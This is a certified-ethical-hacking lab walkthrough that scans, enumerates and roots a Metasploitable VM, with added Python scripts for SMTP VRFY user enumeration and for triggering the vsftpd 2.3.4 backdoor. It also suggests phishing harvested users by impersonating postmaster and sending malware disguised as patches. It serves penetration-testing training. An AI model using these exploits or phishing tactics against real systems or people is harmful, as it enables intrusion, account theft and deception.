CEH v9 : Hacking Metasploitable VM

  • Kali – 192.168.56.101
  • Metasploitable – 192.168.56.102
- Replace these with your own IP addresses as appropriate.

Contents  
  • 1 Footprinting
    • 1.1 Ping
    • 1.2 Traceroute
  • 2 Scanning
    • 2.1 Port Scanning
    • 2.2 OS Fingerprinting
      • 2.2.1 nmap
      • 2.2.2 xprobe2
  • 3 Enumeration
    • 3.1 FTP (TCP 21) Enumeration
    • 3.2 Telnet (TCP 23) Enumeration
    • 3.3 SMTP (TCP 25) Enumeration
    • 3.4 VNC (TCP 5900) Enumeration
    • 3.5 X11 (TCP 6000) Enumeration
    • 3.6 RLogin (TCP 513) Enumeration
    • 3.7 IRC (TCP 6667) Enumeration
  • 4 Exploitation
    • 4.1 FTP Exploit
    • 4.2 VNC Password Cracking
    • 4.3 IRC Exploit

Footprinting

Ping

There is 0% packet loss, so the victim is up and answers ICMP echo requests.

Traceroute

Let's run traceroute to see whether anything sits between us and the victim, such as a firewall or router.
As you can see, there is only one hop between us and the victim (192.168.56.102): both VMs are on the same host-only network and nothing in the path is filtering our probes. This says nothing about a host-based firewall on the victim itself; the port scan will tell us that.

Scanning

Port Scanning

Nmap Script Scan
Let's run an nmap aggressive (-A) scan. -A turns on OS detection, version detection, the default NSE script set and traceroute, so every open port is probed more deeply than in a plain SYN scan and we get service versions and script output to work with in "Enumeration".

OS Fingerprinting

We'll use both nmap and xprobe2 for active OS fingerprinting, since they rely on different probes. nmap sends a series of TCP, UDP and ICMP probes, measures quirks in how the victim's TCP/IP stack answers them (TCP options, window sizes, IP ID and TTL behaviour, and so on) and matches the result against its nmap-os-db. xprobe2 relies mostly on ICMP probes and does fuzzy matching against its own signature database, reporting a ranked list of guesses rather than a single answer. Agreement between the two gives us more confidence than either alone.

nmap

According to the nmap -A scan, the OS is Linux 2.6.x. The version banners also show that several services (Apache, OpenSSH, MySQL) are the Ubuntu builds, which tells us the victim's Linux distribution.

xprobe2

According to xprobe2, the OS is Linux 2.6.11. This agrees with the nmap result (a 2.6 kernel), with xprobe2 committing to a specific point release.

Enumeration

FTP (TCP 21) Enumeration

According to our nmap aggressive scan, anonymous FTP login is enabled. Sometimes an anonymous FTP root exposes large parts of the filesystem. If that were the case here we could download /etc/passwd (on very old systems it still held the password hashes; on this and any modern system the hashes live in /etc/shadow, readable only by root) and crack whatever hashes we obtained with hashcat.
So let's connect. For the password, type in anything.
Login successful. What do we have access to?
Nothing is listed, so anonymous FTP does not give us the filesystem. If the anonymous account were also allowed to write, we could upload a malicious executable and look for a way to get it run, but that is beyond enumeration.
vsftpd 2.3.4 exploit
The nmap -A scan tells us the FTP server is vsftpd 2.3.4. This version has been backdoored (the tarball on the project's download site was tampered with in 2011). There's a Metasploit exploit (exploit/unix/ftp/vsftpd_234_backdoor) for this vulnerability which should give us a command shell. We'll do this in "Exploitation".

Telnet (TCP 23) Enumeration

The telnet banner gives us the login credentials! Let's log in:
Great! We now have a user-level shell on the victim. We also learned that msfadmin is a valid username, which gives us a confirmed account to target with password brute forcing later.

SMTP (TCP 25) Enumeration

Let's connect to the victim's SMTP server using nc (netcat) and enumerate users with the VRFY command, which asks the mail server whether a mailbox exists. Let's try root and msfadmin (which we discovered in "Telnet enumeration").
Both are accepted. To enumerate more usernames, let's use a Metasploit module (auxiliary/scanner/smtp/smtp_enum), which runs VRFY against a wordlist for us.
Users found: backup, bin, daemon, distccd, ftp, games, gnats, irc, libuuid, list, lp, mail, man, news, nobody, postgres, postmaster, proxy, service, sshd, sync, sys, syslog, user, uucp, www-data
We can use this list of users later on for social engineering attacks. For example, we can masquerade as postmaster and ask a user to email us their username/password. We can also send out malicious payloads disguised as patches.
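The VRFY exchange above, automated the way smtp_enum does it, as an added example that is not part of the original post. It opens one session, sends HELO, probes a canary name that no server should accept (if the canary is not rejected the server answers VRFY uniformly and leaks nothing), then classifies the reply code for each candidate: 250/251 confirm a mailbox, 252 is "cannot verify but will try delivery" (which Postfix returns for existing local users while rejecting unknown ones with 550), and 550/551/553 mean unknown. The in-process server, the user set and the host name are constructed for offline use; against the lab you would point enumerate_users at 192.168.56.102 port 25 with a real wordlist.

```python
"""Added example (not from the page): automate the VRFY enumeration done above
by hand with nc, the way auxiliary/scanner/smtp/smtp_enum does. A constructed
in-process SMTP server is included so the script runs offline; against the lab
you would call enumerate_users("192.168.56.102", 25, wordlist) instead."""
import socket
import threading

# Constructed: the users the fake server "knows". Not the page's target list.
FAKE_VALID_USERS = {"root", "msfadmin", "postmaster", "www-data"}
CANARY = "zzqx_not_a_real_user_"   # a name no MTA should accept

def _read_line(sock):
    """Read one CRLF-terminated SMTP line (every reply used here is single-line)."""
    buf = b""
    while not buf.endswith(b"\r\n"):
        chunk = sock.recv(1)
        if not chunk:
            break
        buf += chunk
    return buf.decode(errors="replace").rstrip("\r\n")

def vrfy_user(sock, username):
    """Send VRFY and classify the reply code: 250/251 confirm the mailbox,
    252 is "cannot verify but will try delivery" (what Postfix returns for an
    existing local user), 550/551/553 mean the user is unknown."""
    sock.sendall(f"VRFY {username}\r\n".encode())
    reply = _read_line(sock)
    code = reply[:3]
    if code in ("250", "251", "252"):
        return "exists", reply
    if code in ("550", "551", "553"):
        return "unknown", reply
    return "unexpected", reply

def enumerate_users(host, port, candidates, timeout=5.0):
    """One session: HELO, VRFY a canary name, then VRFY each candidate.
    Returns the sorted confirmed users, or None if the server does not reject
    the canary (then VRFY is answered uniformly and leaks nothing)."""
    found = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        _read_line(sock)                          # 220 banner
        sock.sendall(b"HELO kali.local\r\n")      # HELO keeps the reply single-line
        _read_line(sock)
        if vrfy_user(sock, CANARY)[0] != "unknown":
            sock.sendall(b"QUIT\r\n")
            return None
        for user in candidates:
            if vrfy_user(sock, user)[0] == "exists":
                found.append(user)
        sock.sendall(b"QUIT\r\n")
    return sorted(found)

def start_fake_smtp_server(valid_users=FAKE_VALID_USERS):
    """Constructed stand-in for the target MTA, answering VRFY the way Postfix
    does: 252 for known local users, 550 otherwise. Returns (port, socket)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def handle(conn):
        with conn:
            conn.sendall(b"220 fake.localdomain ESMTP (constructed)\r\n")
            while True:
                line = _read_line(conn)
                if not line:
                    break
                verb, _, arg = line.partition(" ")
                verb, arg = verb.upper(), arg.strip()
                if verb in ("HELO", "EHLO"):
                    conn.sendall(b"250 fake.localdomain\r\n")
                elif verb == "VRFY" and arg in valid_users:
                    conn.sendall(f"252 2.0.0 {arg}\r\n".encode())
                elif verb == "VRFY":
                    conn.sendall(f"550 5.1.1 <{arg}>: User unknown\r\n".encode())
                elif verb == "QUIT":
                    conn.sendall(b"221 2.0.0 Bye\r\n")
                    break
                else:
                    conn.sendall(b"502 5.5.2 Command not recognized\r\n")

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=handle, args=(conn,), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1], srv

if __name__ == "__main__":
    port, srv = start_fake_smtp_server()
    print(enumerate_users("127.0.0.1", port, ["root", "msfadmin", "bob", "postmaster"]))
    srv.close()
```

Two practitioner notes: EXPN and RCPT TO work the same way when VRFY is disabled (Postfix's disable_vrfy_command = yes turns every VRFY into a 252, which is exactly what the canary check catches), and the whole wordlist is sent on one connection because each reconnect costs a banner round trip and shows up as a separate session in the mail log.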

VNC (TCP 5900) Enumeration

Let's connect to VNC using vncviewer:
VNC prompts for a password. We try a few obvious ones such as the usernames, but they all fail. Classic VNC authentication has no username, only a password, so a brute force attack needs nothing more than a wordlist. We'll do this in "Exploitation".

X11 (TCP 6000) Enumeration

Access denied. Let's try to SSH into the victim with the telnet credentials and X forwarding enabled (ssh -X; telnet has no X forwarding).
SSH works! Let's try to open a GUI application like firefox:
It seems the msfadmin session is not allowed to forward X. We can return to this after rooting the victim.

RLogin (TCP 513) Enumeration

Let's use rlogin to try to connect as root.
We obtained root access, with no password required at all! rlogin trusts the hosts and users listed in the target's /etc/hosts.equiv and ~/.rhosts; a wildcard entry there lets any host log in as root without a password, which is the usual cause of this behaviour.

IRC (TCP 6667) Enumeration

The nmap -A scan tells us the victim is running UnrealIRCd 3.2.8.1, a release whose source archive was backdoored. We can exploit this with an existing Metasploit module in the next section.

Exploitation

FTP Exploit

The victim is running vsftpd 2.3.4, which has been backdoored. In Metasploit, we use exploit/unix/ftp/vsftpd_234_backdoor:
We've obtained a root-level shell! The daemon runs with root privileges, so the shell the backdoor hands out is root as well.
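As an added example that is not part of the original post, here is what the Metasploit module does by hand, so the "vsftpd 2.3.4 exploit" note in the Enumeration section and the exploit step above can be verified without Metasploit. The trigger (a USER value containing ":)" followed by any PASS) and the root shell that then listens on TCP 6200 are documented in CVE-2011-2523 and the module's source, not on this page. The emulator of the backdoored daemon, its ports and the probe username are constructed so the script runs offline; in the lab you would call probe_backdoor("192.168.56.102") with the default ports.

```python
"""Added example (not from the page): a manual probe for the vsftpd 2.3.4
backdoor the page exploits with exploit/unix/ftp/vsftpd_234_backdoor. The
trigger (USER containing ":)" then any PASS) and the root shell on TCP 6200
come from CVE-2011-2523 and the Metasploit module, not from this page. The
emulator below is constructed so the probe runs offline."""
import socket
import threading
import time

def _recv_line(sock):
    """Read one newline-terminated line."""
    buf = b""
    while not buf.endswith(b"\n"):
        chunk = sock.recv(1)
        if not chunk:
            break
        buf += chunk
    return buf.decode(errors="replace").strip()

def trigger_backdoor(host, ftp_port=21, timeout=5.0):
    """Log in with the smiley username. The backdoored daemon does not answer
    PASS (it forks the listener instead), so a read timeout here is expected."""
    with socket.create_connection((host, ftp_port), timeout=timeout) as sock:
        _recv_line(sock)                          # 220 (vsFTPd 2.3.4)
        sock.sendall(b"USER probe:)\r\n")
        _recv_line(sock)                          # 331 Please specify the password.
        sock.sendall(b"PASS probe\r\n")
        sock.settimeout(1.0)
        try:
            _recv_line(sock)
        except OSError:
            pass

def probe_backdoor(host, ftp_port=21, shell_port=6200, timeout=5.0):
    """Trigger the backdoor, poll shell_port and run `id` on whatever answers.
    Returns the id output, or None if nothing listened within the timeout."""
    trigger_backdoor(host, ftp_port, timeout)
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        try:
            with socket.create_connection((host, shell_port), timeout=1.0) as sh:
                sh.sendall(b"id\n")
                return _recv_line(sh)
        except OSError:
            time.sleep(0.2)
    return None

def confirms_root(id_output):
    return bool(id_output) and id_output.startswith("uid=0(")

def start_fake_vsftpd():
    """Constructed emulator (not real vsftpd): banners like 2.3.4 and, only
    after a ':)' login, opens a 'shell' port whose `id` answers as root.
    Returns (ftp_port, shell_port)."""
    with socket.socket() as tmp:                  # reserve a free shell port
        tmp.bind(("127.0.0.1", 0))
        shell_port = tmp.getsockname()[1]
    ftp_srv = socket.socket()
    ftp_srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    ftp_srv.bind(("127.0.0.1", 0))
    ftp_srv.listen(5)

    def fake_shell():
        shell_srv = socket.socket()
        shell_srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        shell_srv.bind(("127.0.0.1", shell_port))
        shell_srv.listen(1)
        conn, _ = shell_srv.accept()
        with conn, shell_srv:
            if _recv_line(conn) == "id":
                conn.sendall(b"uid=0(root) gid=0(root) groups=0(root)\n")

    def fake_ftp():
        while True:
            try:
                conn, _ = ftp_srv.accept()
            except OSError:
                return
            with conn:
                conn.sendall(b"220 (vsFTPd 2.3.4)\r\n")
                user = _recv_line(conn)
                conn.sendall(b"331 Please specify the password.\r\n")
                _recv_line(conn)                  # PASS, ignored
                if ":)" in user:
                    threading.Thread(target=fake_shell, daemon=True).start()
                else:
                    conn.sendall(b"530 Login incorrect.\r\n")

    threading.Thread(target=fake_ftp, daemon=True).start()
    return ftp_srv.getsockname()[1], shell_port

if __name__ == "__main__":
    ftp_port, shell_port = start_fake_vsftpd()
    print(probe_backdoor("127.0.0.1", ftp_port, shell_port))
```

The check worth keeping from this is the sequence itself: TCP 6200 is closed before the smiley login and open afterwards, so a port scan taken before and after a single FTP login attempt is enough to tell a backdoored 2.3.4 from a clean build carrying the same banner.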

VNC Password Cracking

Let's use the Metasploit auxiliary module auxiliary/scanner/vnc/vnc_login to brute force the VNC password.
Password found: password.
Let's log in with this password.
It works! A vncviewer window opens. Metasploitable is headless (no monitor attached), but the VNC server runs its own X session, so we can still open GUI applications from here; for example, we can open firefox and search for stored passwords. More importantly, the session gives us a root shell!

IRC Exploit

Again, the victim is running UnrealIRCD 3.2.8.1, which has also been backdoored. In Metasploit, let’s use exploit/unix/irc/unreal_ircd_3281_backdoor:
We’ve obtained another root-level shell.